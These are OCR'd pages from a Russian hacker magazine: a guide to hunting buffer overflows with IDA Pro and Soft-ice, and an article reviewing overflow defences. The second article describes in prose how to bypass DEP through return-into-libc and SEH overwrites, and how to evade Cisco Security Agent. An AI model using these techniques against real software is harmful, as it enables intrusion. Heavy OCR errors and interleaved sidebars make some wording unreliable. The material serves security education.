ствуют между собой, и далеко не все 
ошибки сосредоточены в одном мес- 
те, многие из них "размазаны" по 
большой площади, а в многопоточных 
средах еще и растянуты во времени. 

Методик автоматизированного поис- 
ка уязвимостей, доведенных до "про- 
мышленного" использования, в нас- 
тоящее время не существует, и их по- 
явление в будущем маловероятно. 
Непосредственный анализ обнаружи- 
вает лишь малую толику наиболее 
грубых и самоочевидных ошибок. Ос- 
тальные же приходится выявлять в 
процессе реальной эксплуатации 
программы. Тем не менее, статисти- 
ческие исследования показывают, что 
ошибки возникают не просто так. В 
них есть своя внутренняя система и 
закономерность, благодаря чему 
район "археологических раскопок" су- 
щественно сужается и объем дизас- 
семблерных работ становится вполне 
реальным. 

Анализ машинного кода имеет свои 
сильные и слабые стороны. Хорошая 
новость: здесь нет этих чудовищных 
десрайнов (директив условной транс- 
ляции - define) и не нужно каждый 
раз отвлекаться на выяснение обсто- 
ятельств, какой код компилируется, а 
какой идет лесом. Нет макросов (0со- 
бенно многострочных), и мы всегда 
может отличить функции от констант, 
а константы от переменных. Отсут- 
ствует перекрытие операторов и не- 
явный вызов конструкторов (правда, 
деструкторы глобальных классов по- 
прежнему вызываются неявно). Коро- 
че говоря, компилятор избавляет нас 
от дюжины штучек, затрудняющих 
чтение листингов (как шутят програм- 


мисты, С/С++ - это языки только для 
записи, write only). 

Плохие новости: одна-единственная 
строка исходного текста может соот- 
ветствовать десяткам машинных ко- 
манд, причем оптимизирующие ком- 
пиляторы транслируют программу не 
последовательно, а произвольным 
образом перемешивают машинные 
команды соседних строк исходного 
кода, превращая дизассемблерный 
листинг в настоящую головоломку. 
Все высокоуровневые конструкции 
управления (циклы, ветвления) раз- 
биваются на цепочку условных пере- 
ходов, соответствующую оператору IF 
СОТО ранних диалектов Бейсика. Ком- 
ментарии отсутствуют. Структуры дан- 
ных уничтожаются. Символьные име- 
на сохраняются лишь частично - в 
RTTI-Knaccax и некоторых импортиру- 
емых/экспортируемых функциях. Ие- 
рархия классов со сложным наследо- 
ванием, как правило, может быть пол- 
ностью восстановлена, но расход вре- 
мени на реконструкцию будет слиш- 
ком велик. 

Поразительно, но при всех своих 
различиях методики анализа машин- 
ного и исходного кода удивительно 
схожи, что уравнивает обе стороны в 
правах. Дизассемблирование - вовсе 
не такое таинственное занятие, каким 
оно поначалу кажется, и оно вполне 
по силам инженеру средней руки. 
Есть смысл найти и прочитать "Фун- 
даментальные основы хакерства", 
"Образ мышления ИДА" и "Технику и 


философию хакерских атак - записки 
мыщьха" или любые другие книги по 
этой теме, иначе эта статья рискует 


НЕОБХОДИМЫЙ ИНСТРУМЕНТАРИЙ оказаться слишком абстрактной и не- 
понятной. 


ОШИБКИ ПЕРЕПОЛНЕНИЯ 
Любая программа в значительной 
мере состоит из библиотек, анализи- 
ровать которые бессмысленно: они 
уже давным-давно проанализирова- 
ны, и никаких радикально новых дыр 
здесь нет. К тому же подавляющее 
большинство библиотек распростра- 
няется вместе с исходными текстами, 
так что корпеть над их дизассембли- 
ЕР РР рованием вдвойне ненужно. Как пра- 
вило, библиотечный код располагает- 
ся позади основного кода программы, 
и отделить его достаточно просто. 
Сложнее идентифицировать имена 
библиотечных функций, без знания 
которых мы конкретно завязнем в 
простыне дизассемблерных листин- 
гов, словно в трясине. К счастью, по- 
давляющее большинство стандарт- 
1 ных библиотек автоматически распо- 
Рис. 3. Дизассемблер — знаются Идой. Сигнатуры же экзоти- 
под Palm PC | ческих библиотек от сторонних произ- 
водителей в любой момент можно 90- 
бавить и самостоятельно, благо IDA 
допускает такую возможность (под- 
робности в "Hacker Disassembling 
Uncovered" by Kris Kaspersky и штат- 
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При поиске пе- 


oi реполняющих- 
ной документации). ся буферов 
Решение о загрузке той или иной методом сле- 
сигнатурной базы принимается IDA на пого перебора 
тестируй раз- 
основе анализа стартового кода, и 
личные длины 
"чужеродные" библиотеки рискуют строк, а не 
остаться нераспознанными. То же са- только строки 
Е РНЕ мое происходит и при загрузке дам- ЕО nance 
eA Е0099 пов памяти с поврежденным или от- О ne 
кольку матери- 
сутствующим стартовым кодом или нские функции 
неверно установленной Entry Point могут ограни- 
(хроническая болезнь всех дампе- вать их раз 
мер сверху, 
ров). Поэтому, если большая часть о 
функций программы осталась нерас- коридор. 


познанной (см. рис. 7), попробуй подк- 
лючить сигнатурную базу вручную, 
выбрав в меню File\Load file пункт 
FLIRT Signature file. Появится обшир- 


ный перечень известных Иде библио- Просматривая 
тек (см. рис. 9). Какую из них выб- НЕХ-дамп, 06- 
рать? Если ты новичок в дизассемб- ращай внима- 
лировании и нужную библиотеку не ОНУ 
t ментированные 
_Рис. 5. Профессионально ориентирован- удается отождествить "визуально", ключи (чаще 
ный отладчик Soft-ice | действуй методом перебора, загружая всего они за- 
— Е одну сигнатуру за другой, добиваясь а 
максимального расширения голубой Не, 
заливки (см. рис. 8) них позволяют 
Просматривая список распознанных обойти систему 
и импортируемых сфункций, отберем безопасности и 
самые опасные из них. В первую оче- РАЙ 
редь к ним относятся функции, прини- усмотренные 
мающие указатель на выделенный вещи. 


буфер и возвращающие данные за- 
ранее не предсказуемого размера 
(например sprintf, gets и T.g.). Функции 
с явным ограничением предельно go- 
пустимой длины буфера (fgets, 
GetWindowText, GetFullPathName) нам- 
ного менее опасны, однако никаких 
гарантий их лояльности ни у кого нет. 
Очень часто программист выделяет 
буфер размером намного меньше и 
предохранительный клапан не сраба- 
ИИ тывает. Примера в листинге 1. Очевид- yy 
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но, если пользователь введет с кла- 
виатуры строку в 100 и более байт, то 
произойдет неминуемое переполне- 
ние буфера и никакие ограничители 
длины не спасут! Но это уже лирика. 
Полный перечень потенциально 
опасных функций занимает слишком 
много места, поэтому здесь не приво- 
дится. Будем учиться действовать по 
обстоятельствам. Загружаем исследу- 
емую программу в дизассемблер (пуч- 
ше всего в IDA PRO), нажимаем <Shift- 
F3>, щелкаем мышью по колонке "L" 
(сокращение от Library - библиотеч- 
ная сфункция), отделяя библиотечные 
функции от всех остальных. Достаем 
с полки толстый том справочного ру- 
KOBOQCTBa (для лицензионных поль- 
зователей) или запускаем свой люби- 
мый MSDN (для всех остальных) и 
смотрим на прототип каждой из пере- 
численных здесь функций. Если сре- 
ди аргументов присутствует указа- 
тель на буфер (что-то типа char*, 
void*, LPTSTR и т.д.) и этот буфер при- 
нимает возвращаемые сфункцией дан- 
ные, то почему бы не проверить, как 
он относится к переполнению? 
Нажимаем <Enter>, переходя к началу 
Функции, а затем входим в меню 
View\Open Subview\Cross Reference, отк- 
рывая окно с перекрестными ссылками, 
каждая из которых ведет к точке вызо- 
ва нашей срункции. В зависимости от 
особенностей компилятора и сексуаль- 
ных наклонностей программиста, проек- 
тировавшего исследуемое приложение, 
вызов может быть как непосредствен- 
ным (типа CALL our_func), так и косвен- 
ным (типа Mov ecx, pClass/mov ebx,[ecx + 
4]/call ebx/.../pClass DD xxx/DD offset 
our_func). В последнем случае перекре- 


ПРЕЖДЕ ЧЕМ НАЧАТЬ... 
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Рис. 7. Вид навигатора IDA PRO HM] 


HHL 
Функции с явным ограничением 


предельно допустимой длины буфера 
(fgets, GetWindowText, GetFullPathName) 
намного менее опасны. 


Рис. 9. Перечень сигнатур, известных ИДЕ 
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стные ссылки на OUut_func будут вести к 
DD offset our_func и определить место 
ее реального вызова будет не так-то 
просто! Обычно хакеры в таких случаях 
нанимают отладчик, устанавливая на 
our_func точку останова, а затем запи- 
сывают EIP всех мест, откуда она вызы- 
вается (кстати, наличие интегрирован- 
ного отладчика в последних версиях 
ЮА существенно ускоряет этот про- 
цесс). 

И вот мы находимся в окрестностях 
вызывающего кода! Если аргумент, 
определяющий размер принимаемого 
буфера, представляет собой непосре- 


дственное значение (что-то типа push 
4OOh, см. листинг 2) - это хороший 
знак, и дыра, скорее всего, ждет нас 
где-то поблизости. Если же это не так, 
не стоит отчаиваться: лучше, прокру- 
чивая курсор вверх, посмотреть, где 
этот размер инициализируется. Мо- 
жет быть, он все-таки представляет 
собой константу, передаваемую через 
более-менее длинную цепочку пере- 
менных или даже аргументов мате- 
ринских функций! 

Теперь найдем код, осуществляю- 
щий выделение памяти под буфер 
(обычно за это отвечают сдфункции 


= 


Puc. 10. Берем библиотечную функцию, прототип которой допускает возможность пе- 
реполнения (1), и переходим по перекрестным ссылкам в окрестности ее вызова (2), 
смотрим на ограничитель предельно допустимой длины возвращаемых данных, сверяя 
его с размером выделяемого буфера (3), делаем вывод о возможности (или невозмож- 


ности) переполнения 


Законы безопасного проектирования 
гласят. прежде чем выделять Oycpep, 
определи точный размер данных. 


malloc и new). Если аргумент, onpege- 
ляющий размер выделяемой памяти, 
также представляет собой константу, 
причем эта константа меньше пре- 
дельно допустимой длины возвраща- 
емых данных, дыра найдена и можно 
смело переходить к фазе анализа 
возможных способов воздействий на 
переполняющийся Gycpep через поля 
входных данных. 

Законы безопасного проектирова- 
ния гласят: прежде чем выделять бу- 
фер, определи точный размер дан- 
ных, которые ты собираешься поло- 
жить туда. Другими словами, в пра- 
вильной программе вызову malloc 
или new всегда предшествует strlen, 
GetWindowTextLength или что-то типа 
того. В противном случае программа 
потенциально уязвима. Разумеется, 
наличие превентивной проверки раз- 
мера само по себе еще не гарант ста- 
бильности, поскольку далеко не во 
всех случаях затребованный размер 
определяется правильно, особенно 
если в буфер сливаются данные с 
нескольких источников. 

С локальными переменным в этом 
плане намного сложнее, поскольку их 
размер приходится явным образом 
задавать на этапе компиляции прог- 
раммы, когда длина возвращаемых 
данных еще не известна. Неудиви- 
тельно, что переполняющиеся Oycpe- 
ра чаще всего обнаруживаются имен- 
но среди локальных переменных. 


Локальные переменные хранятся в 
стековых фреймах (англ. frames), так- 
же называемых кадрами или автома- 
тической памятью. Каждой сфункции 
выделяется "персональный" кадр, в 
который помещаются все принадле- 
жащие ей локальные переменные. 
Формирование кадра чаще всего осу- 
ществляется машинной командой 


ххх", где ххх - размер кадра в байтах. 
Текущие версии IDA PRO по умолча- 
нию трактуют все непосредственные 
значения как беззнаковые числа, и 
преобразование "ххх" в " ххх" прихо- 
дится осуществлять вручную путем 
нажатия на клавишу ‹ - >. 

К сожалению, "разобрать" монолит- 
ный кадр на отдельные локальные пе- 
ременные в общем случае невозмож- 
но, поскольку компилятор полностью 
уничтожает исходную информацию и 
анализ становится неоднозначным. 
Однако для наших целей возможнос- 
тей автоматического анализатора IDA 
PRO более чем достаточно. Мы будем 
исходить из того, что локальные бу- 
qpepa чаще всего (но не всегда!) име- 
ют Tun byte *, а их размер составляет 
по меньшей мере 5 байт (правда, как 
показывает статистика, ошибки пере- 
полнения чаще всего встречаются 
именно в четырехбайтовых буферах, 
которые при беглом анализе легко 
спутать с DWORD). 

Рассмотрим в качестве примера 
кадр стека, "разобранный" автомати- 
ческим анализатором IDA PRO, и по- 
пытаемся обнаружить в нем локаль- 
ные 6ycpepa (см. листинг 3). 

Переменная var_38 имеет тип 
DWORD и занимает 4 байта (размер 
переменной определяется путем вы- 
читания адреса текущей переменной 
из адреса следующей: -34h - (- 38h) 
== 4h). На буфер она похожа мало. 

Переменная var_34 имеет тип BYTE 
и занимает 10h байт, что типично для 
локального буфера. То же самое мож- 
но сказать и о переменной уаг_20. Пе- 
ременная Var_24 хотя и имеет тип 
ВУТЕ, занимает всего 4 байта, поэто- 
му может быть как компактным ло- 
кальным буфером, так и простой ска- 
лярной переменной (причем Nocneg- 
ние встречаются намного чаще). До 


Следует пом- 
нить о том, что 
оптимизирую- 
щие компиля- 
торы онлайнят 
функции тет- 
cpy/strcpy и 
memcmp/str- 
cmp, Henocpeg- 
ственно встав- 
ляя их тело в 
код! Ищи 
инструкции гер 
movs/rep cmps 
и исследуй их 


окрестности! 
"SUB ESP, ххх", реже - "ADD ESP, тех пор пока на предмет переполне- 
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Прежде чем 
искать дыры в 
подопытной 
программе, 
убедись, что 
их уже не 
нашли другие! 
Собери все из- 
вестные на 
данный момент 
дыры и отметь 
их на карте 
дизассемблер- 
ного кода. 
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ULTIMATE ADVENTURE » 


ния не будут исследованы все явные 
буфера, возиться с подобными "кан- 
дидатами в буфера" нет никакого 
смысла. 

Просматривая дизассемблерный код 
функции, найдем все ссылки Ha выяв- 
ленный буфер и проанализируем воз- 
можные условия его переполнения. 
Вот например: 


Сразу видно, что переменная var_34 
используется для хранения введен- 
ной строки (значит, это все-таки бу- 
сфер!) с предельно допустимой длиной 
в 300h байт, при длине самой локаль- 
ной переменной в 10h байт. Не исклю- 
чено, что уаг_34, уаг_24 и уаг_20 в 
действительности представляют со- 
бой "кусочки" одного буфера, однако 
в данном случае это ничего не меня- 
ет, поскольку их совокупный размер 
намного меньше 300h! 

Если же среди локальных перемен- 
ных обнаружить переполняющиеся 
буфера несмотря на все усилия так и 
не удастся, можно попытать счастья 
среди развалин динамической памя- 
ти, отслеживая все перекрестные 
ссылки на функции типа New и malloc 
и анализируя окрестности их вызова. 

Как бы там ни было, обнаружив пере- 
полняющийся буфер в одной из глубо- 
ко вложенных сфункций, не спеши ра- 
доваться: возможно, он никак не свя- 
зан с потоком пользовательских дан- 
ных, или (не менее неприятно) одна из 
материнских срункций ограничивает 
предельно допустимую длину ввода 
сверху и переполнения не происходит. 
Пользователи графической версии РА 
(ууу!) могут воспользоваться инстру- 
ментом CALL GRAPH для просмотра ge- 
рева вызовов, уродливо отображающе- 
го взаимоотношения между дочерними 
и материнскими срункциями и позволя- 
ющего (во всяком случае, теоретичес- 
ки) проследить маршрут передвижения 
введенных пользователем данных по 
программе. К сожалению, отсутствие 
каких бы то ни было средств навигации 
(нет даже простейшего поиска!) обесце- 
нивает все прелести CALL СКАРН?а, и 
сориентироваться в построенных им 
диаграммах просто нереально. Однако 
никто не запрещает разрабатывать 
адекватные средства визуализации са- 
мостоятельно. 

Пока адекватный инструмент не го- 
тов, приходится иметь секс с отладчи- 
ком, причем не простой, а анальный. 
История начинается просто. Заполня- 
ем все доступные поля пользова- 
тельского ввода, устанавливаем точ- 
ку останова на вызов считающей их 
функции (например recv), устанавли- 
ваем точки останова непосредственно 
на буфер, принимающий введенные 
нами данные, и затем ждем последую- 
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ЛИСТИНГ 1. ПРИМЕР ПРОГРАММЫ, ПОДВЕРЖЕННОЙ 
ПЕРЕПОЛНЕНИЮ СО СРЫВОМ ПРЕДОХРАНИТЕЛЬНОГО 


КЛАПАНА 


ЛИСТИНГ 2. НЕПОСРЕДСТВЕННОЕ ЗНАЧЕНИЕ МАКСИ- 
МАЛЬНОЙ ДЛИНЫ БУФЕРА, ПЕРЕДАВАЕМОЕ ФУНКЦИИ, 
ХОРОШИЙ ПРИЗНАК ВОЗМОЖНОГО ПЕРЕПОЛНЕНИЯ 


ЛИСТИНГ 3. ЛОКАЛЬНЫЕ ПЕРЕМЕННЫЕ, 


АВТОМАТИЧЕСКИ ВОССТАНОВЛЕННЫЕ IDA 


щих обращений. Чаще всего данные 
обрабатываются не сразу после прие- 
ма, а перегоняются через множество 
промежуточных буферов, каждый из 
которых может содержать ошибки пе- 
реполнения. Чтобы удержать ситуа- 
цию под контролем, мы вынуждены 
устанавливать точки останова на каж- 


дый из промежуточных буферов, обя- 
зательно отслеживая их освобожде- 
ние (после освобождения локального 
буфера принадлежащая ему область 
памяти может быть использована кем 
угодно, вызывая ложные всплытия 
отладчика, отнимающие время и 
сильно нервирующие Hac). А ведь то- 
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чек останова всего четыре... Как же 
мы будем отслеживать обращения к 
десяткам локальных буферов с по- 
мощью всего четырех точек? 

А вот как! Версия Soft-ice gna 
Windows 9x поддерживает установку 
точки останова на регион, причем ко- 
личество таких точек практически не 
ограничено. К сожалению, в Soft-ice 
для Windows МТ эта вкусность отсут- 
ствует, и ее приходится эмулировать 
путем хитроумных манипуляций с ат- 
рибутами страниц. Переводя страницу 
в состояние NO_ACCESS, мы будем от- 
лавливать все обращения к ней (в 
том числе и подопытному Oycpepy). Ec- 
тественно, если размер буфера много 
меньше размера страницы (как изве- 
стно, он составляет 4 Кб), нам придет- 
ся каждый раз разбираться, к какой 
именно переменной произошло обра- 
щение. При желании этот процесс 
можно полностью или частично авто- 
матизировать (имеется множество 


примочек к Soft-ice, поддерживающих 
развитые скриптовые языки). 

Вот так дыры и ищутся! Минимум 
творчества, максимум рутины... 
Стрельбы и гонок по пересеченной по- 
верхности здесь тоже нет. Тем не ме- 
нее, сидеть в отладчике намного кру- 
че, чем смотреть "Матрицу" (кстати, 
никто не знает, где найти оригиналь- 
ную версию третьей части, не изуве- 
ченную переводом?) или апгрейдить 
компьютер gna игры в DOOM 3. 


ЗАКЛЮЧЕНИЕ 

Успех операции во многом зави- 
сит не только от опыта взломщика, но 
и пространственной ориентации мони- 
тора, геометрии мыши и степени по- 
тертости клавиатуры, а попросту гово- 
ря, от степени везучести. Поговарива- 
ют, что мыши и новые клавиатуры 
приносят несчастье: в самый ответ- 
ственный момент курсор прыгает нем- 
ного не туда и переполняющийся бу- 
фер остается незамеченным... a 
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BloodRayne 2 


Смертельное очарование вампира. 


Hitman: Blood Money 
Сорок седьмой снова в деле. 


Блицкриг 2 


Наши переходят в контрнаступление. 


А также: 
® Дневники разработчиков. 5.Т.А.1.К.Е.А., 
«Адреналин-шоу», «Сталинград», 
«Вивисектор», Lada Racing Club 
® Разведка боем. 

Киберспортивный турнир АСОМ 5 

® Под прицелом: Dungeon Siege 11 

® Превью Need For Speed: Most Wanted, 

Rome: Total War - Barbarian Invation, 

Rise of Nations: Rise of Legends, 
Warhammer 40 000: Dawn of War - Winter Assault 
® Рецензии Ha Roller Coaster Tycoon: Soaked!, 
Earth 2160, Fantastic 4, Falcon 4.0, 

RYL: Path of the Emperor, 

The Settlers: Heritage of Kings - Nebula Realm... 
И многое-многое другое! 


ЗАЩИТИ СВОИ ПРИЛОЖЕНИЯ ) 


Илья Рабинович 


ЗАЩИТИ СВОЙ 
ПРИЛОЖЕНИЯ 


КАК ЗАЩИТИТЬСЯ ОТ АТАКИ НА ПЕРЕПОЛНЕНИЕ БУФЕРА 
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M ногие люди задавали этот вопрос себе и окружающим. Очень возможно, что не раз. Да, защититься от атаки на 
переполнение буфера очень тяжело. Прежде всего потому, что этот класс атак мало формализован и крайне 
изощрен. Но, тем не менее, если есть меч, то должен быть и щит! 


_4 


ЩИТ Net: ПАТЧИ OT 


ПРОИЗВОДИТЕЛЯ 


и Универсальный ме- 


тод. Если нет дыры, 


нет и атаки на нее. 
Проблема состоит только в трех ве- 
щах. Первое: иногда после установки 
патча некоторые программы начина- 
ют работать неправильно. Соответ- 
ственно, патчи нуждаются в предва- 
рительном тестировании, требующем 
времени. Второе: бывает так, что пат- 
чи закрывают дыру лишь частично. 
Третье: патчи выпускаются с боль- 
шим (по компьютерным меркам) 
опозданием. Производителю нужно 
время на то, чтобы воспроизвести 
ситуацию у себя в тестовой лабора- 
тории, переписать код, сделать патч, 
проверить этот патч на совмести- 
мость со своими программами и прог- 
раммами сторонних производителей. 
А пока эта работа идет, пользова- 
тель остается беззащитным. А на 
скольких дырках нет патчей, потому 
что производитель о них даже не до- 
гадывается? 


ЩИТ №2: СИСТЕМЫ 
ОБНАРУЖЕНИЯ ВТОРЖЕНИЯ 
(INTRUSION DETECTION 
SYSTEM, IDS) 

и За этим названием скрываются 
программы, проводящие глубокий 
сигнатурный анализ сетевых пакетов 
на известные сигнатуры шелл-кодов. 
Если при этом анализе будет найдена 
сигнатура, соответствующая сигнату- 
ре известного шелл-кода, пакет будет 
заблокирован и атака не достигнет 
цели. Самая известная подобная сис- 
тема распространяется как Ореп 
Source и называется Snort. Эта систе- 
ма очень распространена и популяр- 
на, к ней существует гигантское коли- 
чество сигнатур шелл-кодов, напи- 
санных энтузиастами и системными 
администраторами. 

Недостатки подобных систем оче- 
видны. К ним относятся достаточно 
большое количество ложных сраба- 
тываний и неспособность определять 
те передаваемые по Сети шелл-коды, 
которые не известны системе. Более 
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того, поскольку часто шелл-коды пе- 
редаются в зашифрованном виде, 
стоит сменить алгоритм шифрования 
даже у всем известного шелл-кода, и 
системы IDS уже перестают детекти- 
ровать его. Насколько я знаю, ведут- 
ся работы над тем, чтобы IDS могли 
расшифровывать потенциальные 
шелл-коды на лету, но мне слабо Be- 
рится, что в ближайшее время они 
будут способны на это. Короче гово- 
ря, позаимствовав технологию у ан- 
тивирусов, IDS позаимствовали и их 
недостатки, прибавив к ним и свои 
собственные. Конечно, очень краси- 
во с точки зрения маркетинга, что 
каждый раз, когда IDS ловит пакеты с 
Lovesan, выводится красивое око- 
шечко: "Наша 10$ защитила Вас от 
страшного и опасного вируса 
Lovesan". Во-первых, такое окошечко, 
выскакивающее каждые пять минут, 
уже через двадцать приводит в сос- 
тояние нервного срыва, а во-вторых, 
какое реальное значение оно имеет 
на полностью пропатченной системе, 
не подверженной данной атаке? А 
при целенаправленной атаке на пе- 
реполнение неизвестным для IDS 
шелл-кодом окошечко так и не выс- 
KOUMT... 


ЩИТ №3: ФАЙРВОЛ 
п Работает по принципу "Если отру- 
бить голову, то и насморка не будет". 


Действительно, если сетевые пакеты 
с вредоносным кодом не смогут прой- 
ти куязвимому приложению через 
отключенный с помощью файрвола 
порт, то буфер не будет переполнен и 
атака не состоится. Правда, 
«зафайрволенное» приложение 
фактически перестанет работать Мно- 
го ли «насероришь» в интернете, если 
файрволом отключен 80-й (HTTP) 
порт? Думаю, нет. А атак на перепол- 
нение буфера под Internet Explorer на 
моей памяти было много - от знамени- 
той "уязвимости в картинках" (пере- 
полнение буфера при рендеринге 
УРЕС-изображений) до уязвимости в 
обработчике Е гате-ссылок. Отключа- 
ем 80-й порт? 


ЩИТ №24: МХ/ХО-БИТ 
ПРОЦЕССОРА, ТЕХНОЛОГИЯ 
DEP OT MICROSOFT 

и Что же представляет собой этот 
широко разрекламированный бит? 
Все очень просто. МХ - аббревиатура 
от Non-Executable. Бит неисполняе- 
мости процессора. Как известно, 
шелл-код внутри приложения имеет 
вполне определенное положение - 
это стек, куча или (очень-очень ред- 
ко) статическая память внутри секции 
данных приложения. Если мы запре- 
щаем выполнение кода внутри этих 
областей памяти (метим их МХ-битом), 
то при попытке выполнить шелл-код в 
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Майкрософт о DEP. Конечно, на языке Шекспира 


помеченных областях памяти мы по- 
лучим исключение защиты. Все прос- 
то и гениально. Атака на переполне- 
ние не проходит. 

Именно на основе МХ/ХО-бита и 
построена технология ПЕР от 
Microsoft, встроенная в операционные 
системы Windows ХР SP2 и Windows 
2003 SPI. Также технология DEP 
включает в себя контроль целостнос- 
ти стека и кучи на основе провероч- 
ных данных и контроль цепочки SEH. 
А теперь - по порядку. 

©. Внутри исполняемых процессов 
все области данных метятся МХ-би- 
том, что запрещает исполнение кода 
в них. В случае попытки выполнить 
код в этих областях памяти вылетает 
исключение и приложение заканчива- 
ет свою работу. Если же процессор не 
поддерживает МХ/ХО-бит, то код мож- 
но выполнять в любой доступной об- 
ласти памяти процесса. 

@. Контроль целостности стека 
представляет собой применение ста- 
рой доброй технологии StackGuard, 
реализованной для Linux. При входе 
в функцию в стек запихивается неко- 
торое проверочное число. При выхо- 
де из функции то число, которое ле- 
жит в стеке, сравнивается с эталон- 
ным. Если эти числа не совпадают, 
значит, было переполнение. В этом 
случае генерируется исключение за- 
щиты и приложение заканчивает 
свою работу. Эта возможность зало- 


жена в компиляторы Microsoft начи- 
ная с VC 2003 (директива компилято- 
ра /GS, включена для всех проектов 
по умолчанию). 

С кучей происходит примерно та же 
вещь: в начало каждого блока кучи 
операционная система помещает про- 
верочные данные. Если при выделе- 
нии нового блока или при освобожде- 
нии старого где-то внутри цепочки 
блоков проверочные данные не сош- 
лись, генерируется исключение защи- 
ты. Это не свойство компилятора, как 
в предыдущем случае, а свойство 
операционной системы! 

@. Контроль целостности цепочки 
SEH. В общих словах, SEH - это после- 
довательность обработчиков исклю- 
чений приложения. У каждого потока 
внутри приложения своя цепочка 
SEH! Если в потоке происходит исклю- 
чение, то система последовательно 
вызывает все обработчики, ожидая, 
что хоть один из них справится с ним. 
Если же ни один из обработчиков иск- 
лючений не смог обработать его, то 
вызывается обработчик исключений, 
общий для всех потоков 
(UnhandledExceptionFilter). Если же и 
он бессилен, то системе ничего друго- 
го не остается, как показать сообще- 
ние "Ваш коврик от мышки выполнил 
недопустимую операцию и будет свер- 
нут..." и завершить данное приложе- 
НИЕ. Так вот, возвращаясь к контролю. 
При наличии исключения в потоке 
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система проверяет, не лежат ли agpe- 
са обработчиков исключений внутри 
кучи или стека. Если лежат, система 
генерирует исключение защиты. 

И вроде бы все хорошо, все возмож- 
ные пути проникновения в систему 
перекрыты. Так-то оно так, но не сов- 
сем. Исторически предтечи МХ-бита 
появились Ha В!$С-процессорах 
нете! овской архитектуры. Для них 
же впервые были созданы патчи на 
операционные системы, поддержива- 
ющие разграничение на исполнение 
кода внутри адресного пространства 
процесса. И именно для них появи- 
лись первые "return-into-libc"- 
эксплойты за авторством Solar 
Desiner'a. Все гениальное просто. Ес- 
ли мы угадываем адрес системной 
функции, отвечающей за защиту 
страниц (оригинально исполняемые 
страницы модулей защищены от за- 
писи в них), и адрес функции копиро- 
вания памяти из одного места в дру- 
гое, мы можем скомпоновать данные 
при переполнении так, что при пере- 
даче управления первой его получит 
функция, отвечающая за защиту 
страниц с параметрами, которые поз- 
волят либо отключить защиту от за- 
писи в кодовую часть модулей, либо 
поставить атрибут "исполняемый" для 
какой-нибудь области памяти. После 
этого управление получает функция 
копирования с параметрами копиро- 
вания нашего шелл-кода в уже Nogro- 
товленную для исполнения область. 
Следующая часть Марлезонского ба- 
лета: управление переходит на наш 
скопированный шелл-код в исполняе- 
мой области памяти. Как видишь, для 
реализации данного вида атаки необ- 
ходимо: а) знать адреса функций; 6) 
знать свой адрес; в) перехитрить про- 
верки стека. И тут выясняется, что ре- 
ализовать эти условия достаточно 
легко! Все необходимые срункции для 
копирования памяти и управления па- 
раметрами защиты страницы реализо- 
ваны в модуле kernel32.dll, база заг- 
рузки которого неизменна. Много уга- 
дывать не придется. Свой адрес мы 
можем также примерно знать, вбра- 
сывая, например, большие порции 
данных Ox90 (команда пор) и шелл- 
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Целый номер Спеца, посвященный переполнению буфера! 
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ЗАЩИТИ СВОИ ПРИЛОЖЕНИЯ ) 


кодом в конце. А перехитрить провер- 
ку целостности стека можно таким об- 
разом: мы переполняем буфер боль- 
шим пакетом данных так, чтобы пере- 
писать ближайший адрес обработчи- 
ка исключений SEH не просто, a что- 
бы он начал указывать внутрь какого- 
нибудь модуля на нужную нам после- 
довательность опкодов. Например, 
add esp,XXX, ret. Теперь, при выходе 
их функции, буфер внутри которой 
мы переполнили, обычно сначала вы- 
полняется восстановление из стека 
сохраненных регистров, после чего 
идет проверка целостности стека. И 
тутвыясняется, что было переполне- 
ние. SOS! Выбрасывается исключение, 
которое ловит - правильно! - уже наш 
обработчик SEH. Инструкция add 
esp,XXX очистит стек OT тех данных, 
которые туда вбросила система при 
вызове обработчика в цепочке SEH, а 
инструкция ге{ передаст управление 
по нужному нам адресу, который мы 
уже заботливо положили в стеке. Це- 
почка "return-into-libc" успешно вы- 
полнена! Защита рухнула! Так что не 
бывает непробиваемых защит - быва- 
ют только плохо изученные. Нужно 
учиться, и тогда никакая защита не 
устоит перед тобой. Описанный при- 
мер лишь учебный, полет фантазии 
при проектировании шелл-кодов не 
ограничен ничем. 

Кстати, по умолчанию DEP включен 
только для компонентов операцион- 
ной системы. Для программ сторонних 
разработчиков он выключен! Поче- 
му? Да потому что огромное количе- 
ство программ выполняют свой код в 
куче или стеке, и часто даже без ве- 
дома самих разработчиков! Как такое 
может быть? Очень просто! При саб- 
классинге библиотека ATL помещает 
специальную сфункцию-переходник в 
кучу или стек и ставит на нее адрес 
обработчика оконной функции. В ито- 
ге при любом вызове оконной функ- 
ции, перехваченной таким образом, 
сначала вызывается переходник в ку- 
че или стеке, который, в свою оче- 
редь, вызывает обработчик оконной 
функции, уже написанный разработ- 
чиком. И таких программ довольно 
много (навскидку, из известных - 
VMWare). 

Если же процессор He обладает 
МХ/ХО-битом, то тут дело совсем пло- 
хо: как все только что убедились, за- 
щита от переполнения буфера от 
Microsoft тянет хоть на что-то только 
при наличии МХ/ХО-бита. Без него 
предыдущий пример был бы еще про- 
щеи "return-into-libc"-TexHonoruu бы- 
ли бы не нужны. Ставим обработчик 
ошибок SEH на заранее найденную 
инструкцию jmp [езр+8]-, и шелл-код 
зашуршал своими байтиками и опко- 
дами в обход всех защит. И отсюда 
следует... 
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Неидеальный Cisco Security Agent 


ЩИТ №5: ЗАЩИТА OT 
СТОРОННИХ РАЗРАБОТЧИКОВ 

и Рассмотрим наиболее известные 
продукты - DefencePlus, Cisco Security 
Agent, StackDefender, OverflowGuard - 
в обратном порядке (по возрастанию 
уровня сложности программ порядок 
именно такой). 

OverflowGuard защищает только 
сервисы Microsoft Windows. Защита 
строится на неисполняемости стека и 
кучи. Правда, в отсутствие NX/XD-6u- 
та эта неисполняемость достается go- 
рого - ценой производительности сис- 
темы. Именно поэтому OverflowGuard 
защищает только сервисы: чем мень- 
ше защищаемых приложений, тем 
меньше падение производительнос- 
ти. Защита декларируется от return- 
into-libc, но проверить это на практике 
очень тяжело. Прогнать тесты на соф- 
те, который защищает систему ТАК, 
практически нереально. Кроме того, 
если учесть, что акценты атак на пе- 
реполнение буфера сегодня смеща- 
ются в сторону программ не от 
Microsoft, эта программа вообще ни от 
чего, собственно, не защищает. 

Cisco Security Agent базируется на 
перехвате вызовов сфункций, TO есть 
если наш шелл-код вызывает функ- 
цию StartService, этот вызов будет пе- 
рехвачен обработчиком от Cisco и 
проанализирован на адрес возврата 
из функции. Этот адрес должен ле- 
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жать внутри модуля, и перед ним 
должна быть инструкция са! [что-ни- 
будь] или jmp [что-нибудь]. 

Эти проверки обходятся также эле- 
ментарно. Достаточно при вызове 
функций, перехваченных CSA, подс- 
тавлять не свой адрес возврата, а ag- 
